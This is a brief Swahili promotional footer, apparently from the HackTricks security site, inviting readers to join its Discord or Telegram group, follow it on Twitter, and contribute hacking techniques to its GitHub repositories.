• Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa HackTricks na HackTricks Cloud github repos.